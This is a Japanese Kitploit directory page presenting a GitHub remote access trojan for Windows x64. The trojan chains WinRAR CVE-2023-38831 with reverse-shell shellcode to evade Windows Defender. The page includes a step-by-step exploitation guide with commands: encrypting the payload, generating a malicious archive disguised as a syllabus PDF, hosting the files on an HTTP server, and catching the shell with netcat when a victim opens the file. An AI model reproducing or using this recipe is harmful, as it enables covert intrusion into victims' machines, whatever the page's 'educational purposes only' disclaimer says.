Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Windows-X64-RAT — 脆弱性 CVE-2023-38831(WinRAR < 6.23 の脆弱性)と Shellcode エクスプロイト技術を組み合わせた、Windows x64 向けリモートアクセス型トロイの木馬(RAT)。 | Kitploit
ツール/GitHubGitHub/maorbuskila/windows-x64-rat
脆弱性分析エクスプロイトシェルコードコマンド&コントロール学習と教育ペイロード開発リモートアクセストロイの木馬バイナリエクスプロイト
GitHubmaorbuskila/windows-x64-rat

Windows-X64-RAT

脆弱性 CVE-2023-38831(WinRAR < 6.23 の脆弱性)と Shellcode エクスプロイト技術を組み合わせた、Windows x64 向けリモートアクセス型トロイの木馬(RAT)。

リポジトリを見る
2502年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Windows x64 リモートアクセス型トロイの木馬 (RAT)

目的

Windows Defender を回避するために、CVE-2023-38831 (WinRAR < 6.23) とシェルコードの悪用を利用した Windows x64 RAT を開発します。

システム説明

  1. シェルコードの初期化
    • Windows/x64 - PIC Null-Free TCP Reverse Shell シェルコードを使用してシェルコードを生成します。
  2. main.cpp の説明
    • リバース TCP 接続を確立するために、シェルコードをメモリに注入して実行します。
  3. main.cpp のコンパイルと暗号化
    • C++ ファイルを実行可能ファイルにコンパイルし、暗号化します。
  4. WinRAR CVE-2023-38831 の悪用
    • この脆弱性を利用して、暗号化された RAT をダウンロード、復号化、実行します。
  5. スクリプトの復号化と実行 (decrypt_file.ps1)
    • ダウンロードした実行可能ファイルを復号化して実行します。
  6. 実行
    • 細工された PDF/画像を開いて、リバースシェル接続をトリガーします。

悪用ガイド

警告: この情報は教育目的のみで提供されています。これらの技術を無断で使用することは違法かつ非倫理的です。

ステップバイステップの手順

  1. シェルコードの作成

    • 51721.py を使用して初期シェルコードを生成します。
  2. シェルコードの修正とコンパイル

  • シェルコードに必要な修正を加えます。
  • 修正したコードをコンパイルします。
  • 実行可能ファイルの暗号化

    • decrypt_file.ps1 を使用してコンパイル済みの実行可能ファイルを暗号化します:
      root@kitploit:~
      .\decrypt_file.ps1 -inputFile .\main.exe -outputFile .\enc_main.exe
      
  • WinRAR アーカイブの作成

    • cve-2023-38831-exp-gen.py を使用してアーカイブを作成します:
      root@kitploit:~
      python cve-2023-38831-exp-gen.py NetworkSecuritySyllabus.pdf script.bat NetworkSecuritySyllabus.rar
      
  • ファイルダウンロード用の Python サーバーのセットアップ

    • enc_main.exe と decrypt_file.ps1 を含むディレクトリに移動します。
    • Python HTTP サーバーを起動します:
      root@kitploit:~
      python3 -m http.server 8000
      
  • リバース TCP シェルの待ち受け準備

    • 着信 TCP 接続を待ち受けるために Netcat を起動します:
      root@kitploit:~
      nc -lnvp 4444
      
  • リバース TCP シェルのトリガー

    • 被害者が PDF ファイルを開くと、リバース TCP 接続がトリガーされ、そのマシンへのアクセスが得られます。
  • 免責事項

    この情報は教育目的のみで提供されています。明示的な許可なくこのエクスプロイトを使用することは違法かつ非倫理的です。作者は、この情報の悪用について一切の責任を負いません。

    ツールをダウンロード